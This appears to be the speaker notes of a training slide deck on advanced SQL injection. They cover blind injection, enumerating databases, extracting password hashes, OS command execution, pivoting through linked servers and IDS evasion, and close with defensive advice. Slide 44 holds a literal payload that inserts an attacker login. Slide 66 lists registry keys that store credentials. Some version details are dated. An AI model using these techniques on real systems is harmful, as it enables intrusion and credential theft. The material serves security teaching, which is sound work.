  22. The information gathering stage is fundamental. The scope and depth of the subsequent attack as well as, the query syntax to be used will both be determined by the results of this stage. Output mechanisms are essential for extracting information about and within the database. Depending on the type of mechanism found, it will strongly change the attack techniques. Understanding the underlying query will allow to craft correct statements. By knowing this, different types of error messages and attacks are possible. Different databases allow and require different SQL syntax. Defining the database engine type is fundamental for the following stages. Most advanced SQL injection requires high user privilege levels. Knowing what we can or cannot do will save us time. Finally, interacting with the underlying operating system either through command execution or through read/write access to the file system will allow a whole different group of attacks.
  23. An important aspect of SQL Injection is getting information back. This can be tricky because Web Applications do not normally allow you to see the results of your queries. For the attacker, the easiest situation would be to have the results of the modified query displayed as part of the web server response. This sometimes happens when the vulnerable input is part of query that sends a result set back to the web application, such as lists. In this case most information can be crafted through union statements to be displayed with the result set. In other cases the modified query result set is used by the application and is not displayed through the web application. If the Web Server is configured to display error messages, a lot of information can be extracted through them. Finally, if the modified query interrupts the normal behavior of the application (which can result in a 403 or 404 error message) but no error message is displayed, this is normally an indication of blind SQL injection. There are methods to extract information from databases through time delays or error signatures. Almost the same things can be done in both scenarios but Blind Injection is much slower, much noisier and more difficult because most of the information hast to be extracted slowly (through a lot of queries) or guessed. Other mechanisms that may be used to send information are email, creating remote webpages using smb, or sending complete files with ftp or tftp.
  24. Grouping error Within a SELECT statement the HAVING command allows to further define a query based on the “grouped” fields. The error message will tell us which columns have not been grouped. Type mismatch or overflow errors By trying to insert strings into numeric fields or a bigint into an int the error message will show us the data that could not get converted.
  25. By using a condition as shown in the first example and if we know the expected outcome for a correct and for an incorrect condition, we can prove if the condition is true or not. This works with all SQL databases, what varies is the type of condition we can insert. Using if statements with some kind of delay is different for different databases. Some like MS SQL Server will require the IF condition to be a separate command (shown in the WAITFOR DELAY query above). In others, like in MySQL the same effect can be achieved with the BENCHMARK function, which can be used as an expression within a SELECT statement. Additionally, we can run the same types of queries as in normal injection but with no debugging information. This gets complicated fast. With the Boolean responses we can extract text information by converting it into ASCII and then converting the ASCII to binary and THEN getting one bit at a time. This can be very time consuming and above all notorious because of its noisiness. It has been automated in tools like SQueaL that allow complete database structures and their contents to be transferred bit by bit.
  26. It is important to know in what part of the modified query we are. The parameter we are modifying can land in wide variety of places. It can be part of a SELECT, UPDATE, EXEC, INSERT, DELETE or CREATE statement. It can be part of a subquery, a stored procedure parameter or something more complex. We start by determining what the form or page is trying to do with our input. What is the name of the field? How would we have written that SQL query?
  27. Most injection points end up in the WHERE clause of a SELECT statement as shown above. There are several parts of the statement that can be bypassed or included depending on how we structure our insertion.
  28. UPDATE statements are also found in places like the &amp;quot;change my password&amp;quot; section. It can be trickier to inject into an UPDATE statement. You potentially do more damage. In our example above you can end up inserting into the SET part of the query (&amp;apos;new password&amp;apos;). And if you do and decide to comment the rest of the query, all users in the table users would get their password changed.
  29. To better understand a SELECT query a good way is to try to replicate an error free navigation. By sending statements like the ones described above you can be certain of the application responses to both TRUE and FALSE conditions. We try generating specific types of errors that give you more information about the table name and parameters in the query. Sometimes we may have to add parenthesis to escape a subquery.
  30. We can also inject into stored procedures or add batch commands to the execution depending on how the parameters are passed to the store procedure and how it is executed. If we know there is a vulnerability we can add new variables and parameters to try to understand the query. We will get different types of errors depending on what we add. The PRINT command is also useful because it is recognized by the database engine but should have no effect. Passing a @@variable to the print command can help distinguish between correct or incorrect responses. The main purpose is to try to identify if commands are being executed or not and exactly in what part of what query we landed on.
  31. There are some tricky queries where you end up in the middle of a subquery or a BEGIN-END statement. We will try to close parenthesis and add END commands. This may help to escape the query. In other occasions the same input will be used in several queries. Slightly changing the input gives you different error messages that come from different queries. This gets particularly confusing when trying UNION statements. You will normally be able to work generating errors in the first query. The tough part is realizing which errors come from which queries. Sometimes we cannot change or inject anything into the query without generating a cascade of errors that are inescapable. There are some queries that because of the way they are built or the database they are using, are simply impossible to escape. In these cases it is easier to go and find another injection point.
  32. Determining the database engine type is fundamental to continue with the injection process. Most times this will be easy if we have error messages coming back. ODBC will normally display the database type as part of the driver information when reporting an error. In those cases where the error message is not an ODBC message that can also be useful. First, you know you are most probably not on a Windows box. By knowing what operating system and web server we are connecting to it is easier sometimes to deduce the possible database. Using specific characters, commands, stored procedures and syntax we can know with much more certainty what SQL database we have injected into.
  33. Above are some differences that can be used to determine what db we are in if we have no other easier way. By trying out conditions using the &amp;apos;and condition and &amp;apos;1&amp;apos;=&amp;apos;1 statement we can determine what type of database we have connected to.
  34. The differences from one database to the other will also determine what we can or cannot do. To notice, MySQL is the only one that does not support subqueries in its current release. Nevertheless, beta version 4.1 has implemented subqueries and will soon be released. The UNION statement was implemented in MySQL version 4.0. Batch queries are not very common and stored procedures are only available in MS SQL and Oracle. The more complete, flexible and OS integrated a database is, the more potential avenues of attack.
  35. The next piece of information we need to know are what privileges are we running with. We will have the privileges of the user with which the application server connects to the database. We want to know what that user&amp;apos;s privileges are. SQL99 has built-in scalar functions supported by most SQL implementations that allow us to query within a SELECT statement for the current user, the session user and the system user. We can use these functions to return the user name within an error message. If we are using blind injection we can also use an if and a time delay along with the name of a privileged user (dba or root) to determine if we are administrators or root of the database.
  36. Default database administrator accounts vary from one database to another. It is common to find SQL injection in connections that are running default administrator privileges. A default administrator will have privileges to do everything within the database and that in some cases extends over to the operating system easily.
  37. Once we know basic information about the database, the query structure and our privileges we will start the attack.
  38. The next thing we will want to know is the database structure. For that we will use the &amp;quot;HAVING 1=1&amp;quot; statement to enumerate all columns in the table. After that, by using a UNION statement and trying to sum() a column name we can quickly identify numeric from alphanumeric columns. To enumerate tables in a database we can directly query the metadata. Each database has its own metadata structure. The one above is a MS SQL specific query.
  39. In different databases the queries to enumerate the columns of a table can also be done directly by querying the metadata. In each database the syntax is slightly different.
  40. This query enumerates all tables and columns in the database. It can be inserted into a grid result. This also uses common metadata tables to determine the table, each field in the table, and the type of each field. This result set could also be concatenated through a temp table into a single string and with Substring() could be used to get the results through error messages, 256 characters at a time.
  41. Some servers have several databases. By interrogating metadata system tables information about the databases can also be extracted.
  42. This is a list of some of the useful metadata system tables in different databases.
  43. Extracting data is easy once the database has been enumerated and the query is understood.
  44. With this query all the logins and passwords from our users tables are extracted into a variable called @var. This variable @var is inserted into a new table called temp in a column called var. The var column of the temp table is then sent back through an error message. The temp table is deleted from the database. We could also insert a login and password of our own into the users table with the following command: &amp;apos;; insert into users select 4,&amp;apos;Victor&amp;apos;,&amp;apos;Chapela&amp;apos;,&amp;apos;victor&amp;apos;,&amp;apos;Pass123&amp;apos; --
  45. An additional step would be to create our own user account for the database. This might allow us to connect directly to the database and is necessary for certain types of commands. With the appropriate privileges we can create our own account in the database. Here is a list of some commands to create user account in different databases engines.
  46. Some databases also store the hashes for the database user passwords within a table. In MS SQL Server the name and password for users are stored in a table called sysxlogins. To extract them we have to convert the hashes that are kept in binary form into a hexadecimal format that can be displayed as part of the error message. We then concatenate them into one single long string. One important thing to note is that even though the name column in sysxlogins is public, the password column requires dbo access level. If access to the password fields is not possible, the user names can be used as part of a brute forcing attempt described later.
  47. To do this we select one by one the entries within sysxlogins that have a password. We then hex each hash and concatenate it to the variable we are building. We repeat this for each valid password. We end up with a table that contains in one single line, all the user name/password pairs (up to 8000 characters).
  48. This is the complete statement we defined to translate the passwords to hex, concatenate them and store them as part of a varchar variable. This query requires some changes for long user tables.
  49. We then use substring to extract one 256 character piece at a time.
  50. The hashes could be broken offline. But if we wanted to use the victim Server processing power to brute force the password hashes we could use the above query to start an dictionary attack on the stored hashes. The dictionary could be inserted by hand, with a perl script or by sending a wordlist (we will later see some options for file transfers).
  51. If we have network connectivity a reverse connection can be established and the whole database can be transferred to our local SQL Server.
  52. By transferring the database&amp;apos;s metadata you can recreate the database structure in your local system.
  53. Once the structure has been recreated, the data may be easily transferred a table at a time. Using this method, an attacker can retrieve the contents of a table even if the application is designed to conceal error messages or invalid query results.
  54. Depending on the database type and our privileges with in it, we may be able to interact directly with the underlying operating system.
  55. There are two main ways to interact with the operating system. Depending on the database engine and the configuration we may be able to read and write files or execute commands. In both cases we will be restricted by the privileges and permissions of the user with which the database engine is run. If we can read and write files we will be able to upload into the database files containing password and configuration information. In a similar way we would also be able to change some of the passwords or configuration files by appending or overwriting system files. If we have OS command execution we will be able to do anything.
  56. The LOAD_FILE function returns a string containing the contents of a file, specified by it&amp;apos;s path. LOAD_FILE also works on binary files, and SUBSTRING allows you to skip nulls and select x characters at a time, so the attacker can use this technique to read arbitrary text or binary files. LOAD_FILE is a function that can be used as a term in a select statement, whereas issuing a complete statement like &amp;apos;LOAD DATA INFILE&amp;apos; is somewhat tricky. If the SQL injection situation allows us to submit multiple statements, however, this can be a serious problem. The companion statement to LOAD DATA INFILE is SELECT INTO OUTFILE. Many of the same disadvantages are present from the attacker&amp;apos;s point of view. MySQL does not support batch queries and therefore it is difficult to execute through SQL injection. Nevertheless, this statement represents the most obvious way for an attacker to gain control of a MySQL Server. Normally by creating nonexistent configuration files, possibly in users home directories. We can also create binary files with SELECT INTO DUMPFILE. It&amp;apos;s worth remembering that in recent versions this statement cannot modify existing files; it can only create new ones.
  57. The XP_CMDSHELL extended procedure allows us to execute any OS command in a non interactive way. To be able to read the results of the command execution we have to send the output into a file and then insert that file into the database using bulk insert. Once in the database, we can concatenate the data into one long string so we can read it 256 characters at a time through error messages. We would then delete the temporary file and table at the end.
  58. It is important to keep in mind that the web server in most cases is not the database server. So we might be executing commands in a server that has no direct Internet connectivity.
  59. To expand our influence into the operating system we want to know if we have some kind of network connectivity. To do so there are several different techniques we can use. We can interrogate the database for the server name and we can use xp_cmdshell to run OS level networking commands. We may also try reverse connections that will give us information about the remote IPs or even allow us to upload files.
  60. When using a reverse DNS lookup we will have to use our own IP and ask for any domain name. By using a sniffer or by checking our firewall log we will be able to see the incoming DNS requests. DNS lookups will normally get through firewalls and proxies even if the machine has no Internet access configured by using the DNS hierarchy. Another way of doing this is with ICMP packets, for example using PINGs. This is more likely to be blocked by the firewall though. We may try to use OPENROWSET (this does not require administrative privileges) to connect back to our own IP. We can choose to connect to port 80 in an attempt to circumvent firewall or proxy rules.
  61. By executing these commands we can retrieve a very detailed network configuration.
  62. To execute network reconnaissance in a simple steps the above statements could be executed.
  63. To be able to execute OS commands through SQL Injection is not always possible.
  64. In most databases, the path into the operating system will not be direct. We will have to start searching for passwords and in some cases replacing configuration files to be able to gain access. And access will be obtained indirectly. In MS SQL Server in particular we will be able to use the exec xp_cmdshell procedure to execute commands. One of the first thing we may want to do as an attacker is to add our own user and include it as an administrator. There are a lot of different extended procedures in MS SQL Server that can be abused by an attacker. Another one is xp_servicecontrol that allows us to start a service.
  65. Yet another way to execute commands or applications from SQL Server is through ActiveX automation. Several built-in extended stored procedures are provided which allow the creation of ActiveX Automation scripts in SQL server. These scripts are functionally the same as scripts running in the context of the windows scripting host, or ASP scripts - they are typically written in VBScript or JavaScript, and they create Automation objects and interact with them. An automation script written in Transact-SQL in this way can do anything that an ASP script, or a WSH script can do. This example illustrates the flexibility of the technique; it uses the &amp;apos;speech.voicetext&amp;apos; object, causing the SQL Server to speak.
  66. There are also extended procedures that will allow us to read or write to the registry. With the xp_regread we would be able to extract the decimal equivalent of the obfuscated VNC password. The whole set of built in extended stored procedures for interacting with the registry are: xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumkeys, xp_regenumvalues, xp_regread, xp_regremovemultistring and xp_regwrite. Some other interesting keys to explore include: HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters\nullsessionshares HKLM\SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Winlogon\DefaultUserName HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Winlogon\DefaultPassword HKLM\SOFTWARE\Microsoft\TelnetServer\1.0\NTLM HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous HKLM\SOFTWARE\ORL\WinVNC3\Default\Password HKU\Software\ORL\WinVNC3\Password HKLM\SOFTWARE\Symantec\Norton AntiVirus\CurrentVersion HKU\Software\Microsoft\Internet Account Manager\Accounts\ 00000001\POP3 User Name HKU\Software\Kazaa\UserDetails\UserName HKU\Software\Microsoft\Exchange\UserName HKU\Software\Microsoft\Exchange\LogonDomain
  67. In this final stage we may want to expand our influence to other applications or servers.
  68. To find out if there are any linked servers we may use the sysservers table. Once we know what the other servers are, hopping into their databases can be easily achieved by using the OPENROWSET command again.
  69. Linked and remote servers in Microsoft SQL Server allows one server to communicate transparently with a remote database server. Linked servers allow us to execute distributed queries and even control remote database servers. We could use this capability to access the internal network. We would start by collecting information from the master.dbo.sysservers system table as demonstrated here. To expand further, the attacker could then query the information from the linked and remote servers. The first insert brings us the linked servers in the sysservers table. The second one allows us to retrieve the sysservers table in one of the linked servers. And the last insert would retrieve the remote databases from the sysdatabases table in the linked server.
  70. Sometimes the servers will be configured to only allow remote stored procedure execution and they will not permit arbitraries queries to run. If the linked and remote servers are not configured for data access we could try this. All the queries can be done through the sp_executesql stored procedure that circumvents this restriction.
  71. Once we have gained adequate privileges on the SQL Server, we will then want to upload “binaries” to the server. Since normally this can not be done using protocols such as SMB, since port 137-139 typically is blocked at the firewall, we will need another method of getting the binaries onto the remote file system. This can be done by uploading a binary file into a table local to us and then pulling the data to the remote server file system using a SQL Server connection. Having created the table to hold the binary, the attacker would then upload the binary into the attackerTable. To circumvent the firewall, we will then configure a connection to our server over port 80 by modifying the registry. The binary can then be downloaded to the victim server from our server by running the remote bcp statement on the victim server. This statement will issue an outbound connection to the attacker’s server and write the results of the query into a file recreating the executable.
  72. When there is no Internet connectivity files can still be uploaded by hexing them and sending them as part of the query strings. This is still a manual and tedious process but can be done by a dedicated hacker.
  73. The whole queries would have taken too much space to include here.
  74. Both IDS and input validation circumvention are very similar. We will use different techniques to change the expected input and bypass completely the &amp;quot;signatures&amp;quot;. IDS or IPS should never be used alone to protect applications from SQL Injection vulnerabilities. It should be implemented as an alerting mechanism.
  75. An IDS signature may be looking for the &amp;apos;OR 1=1. There are numerous ways of replacing this so that it continues to have the same effect.
  76. One common way to implement input validation in PHP is by using PHP&amp;apos;s addslashes() function or by turning on magic_quotes_gpc. This will protect string injection but this may give them a false sense of security since injection in numeric fields is still possible.
  77. Some ways to evade and circumvent validation or detection is through encoding of parameters. Different types of detection will be vulnerable to distinct encoding.
  78. To inject into MySQL without using double quotes the char() function can be very useful. Char() also works on almost all other DBs but sometimes it can only hold one character at a time like for example char(0x##)+char(0x##)+…
  79. IDSs used to be vulnerable to changing the number of white spaces and could be tricked by doing so. Adding special characters like tab, carriage return or linefeeds will sometimes evade the signature. Some SQL interpreters do not even need spaces between commands and parameters. This would completely change the IDS&amp;apos;s signature and make untraceable without changing the execution of the statement.
  80. There is another very interesting way to evade IDS. And that is by using the multirow comments. These will work in almost all databases and can be used to replace white spaces. They could even allow to spread commands through different fields.
  81. In MySQL comments can even be put in the middle of SQL commands. Another way of splitting instructions to avoid IDS detection is by using execution commands that allow us to concatenate text in Oracle or MS SQL Server.
  82. Other techniques will allow us to define variables and then have them executed. Variables can be defined in hex completely avoiding the need for single quotes.
  83. Input validation is the most important part of defending against SQL injection. You should enforce input validation in all new applications through strong design. Any you should audit all your existing code and websites. You should additionally always harden your servers as well.
  84. What we believe to be a strong design, is that which can be secure always. For this to happen it has also to be the easiest way for programmers to query the database. You should use stored procedures to interact with database and call procedures through a parameterized API. All input should be validated and all database users should run under the &amp;quot;least privilege&amp;quot; principle. You may need to define different roles, one for every type of query.
  85. For each field you should define the type of input it will allow. Then you should use filters to verify that only good input gets through and that you reject any suspicious one. Implement &amp;quot;known bad&amp;quot; filters for SQL reserved words and characters.
  86. Harden your servers. If there is a breach, you should be protected to the core. Never trust your input validation, applications continue to change through time and unexpected vulnerabilities may emerge in time.
  87. One last but important point is to apply dissuasive messages to your error messages. This will scare most of the possible attackers away. Use an IDS to detect and block attacks, they may try other avenues if the first one fails.